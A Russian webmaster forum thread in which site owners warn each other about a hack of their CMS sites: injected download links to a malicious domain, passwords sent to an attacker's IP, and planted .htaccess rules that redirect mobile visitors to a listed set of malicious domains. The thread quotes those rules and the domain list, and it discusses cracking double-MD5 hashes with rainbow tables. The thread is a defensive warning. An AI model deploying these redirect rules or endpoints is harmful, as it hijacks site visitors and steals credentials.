- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
fxtotal, отписал в ПМ.
Советую всем проверить свои сайты на наличие новой опасной штуки. Видимо созданной всё тем же злодеем, так как домен снова заканчивается на 00xff.net. Я уже радовался, что всё закончилось и думал - 'О, Чудо!". Но нет! Теперь ВО ВСЕХ новостях на сайте в самом низу появилась надпись "Скачать по прямой ссылке" ведущая на http://yandex.narod.ru.00xff.net/load.php?name=kakaya-libo-igra-ili-chto-to-eshe... Теперь придётся чистить БД.
И да. На сайте всего один пользователь и ни одной аватарки.
покажи урл...
Подскажите, как он мог туда попасть и что он делает. Этот код был на двух сайтах, один 9.5, другой - 9.7
Такой же код обнаружил и на версии 9.8. (Лицензия)
Уязвимость во всех версиях движка. Взломщик крадет пароли и отсылает их на ip
178.211.33.74/get_api.php?pid=2&
Взломщик крадет пароли и отсылает их на ip
Там же хеши md5
Там же хеши md5
может он сравнивает с базой известных...
Последние вести с фронтов.
Теперь еще изменяют файл .htaccess
RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)
RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]
RewriteCond %{HTTP:x-wap-profile} !^$ [OR]
RewriteCond %{HTTP:Profile} !^$
RewriteCond %{HTTP_HOST} !^m\.
RewriteCond %{HTTP:Cookie} !\smredir=0(;|$)
RewriteRule ^ http://$host/ [R,L]
В $host вставляется случайным образом выбранный домен из массива:
$domains = array('statuses.ws', 'live-internet.ws', 'googlecount.ws', 'livecountall.ws', 'googleinternet.ws', 'yacounter.ws', 'getinternet.ws', 'yandex-google.ws', 'ya-googl.ws', 'ya-analytics.ws', 'yadirect.ws');
Проверяйте свои сайты.
Там же хеши md5
А что мешает потом расшифровать?
А что мешает потом расшифровать?
Там двойной md5 - рашифровка займет перебором очень большое время.
Там двойной md5 - рашифровка займет перебором очень большое время.
Радужные таблицы.
Сервис для таких операций(обратите внимание на огромный селект с вариантами хэшей).
Дыры на сайте искать надо. Без закрытия дыр вся работа по поиску/удалению шеллов, вирусов итп будет сведена к нулю. Кого взломали, тем первым делом следуе смотреть конфиги и изменения в файлах, позволяющих выполнять серверные скрипты. Доры пишут туда. Потом вешают шеллы.
Кому интересно, могу поверхностно посмотреть сайт на уязвимости.
http://insafety.org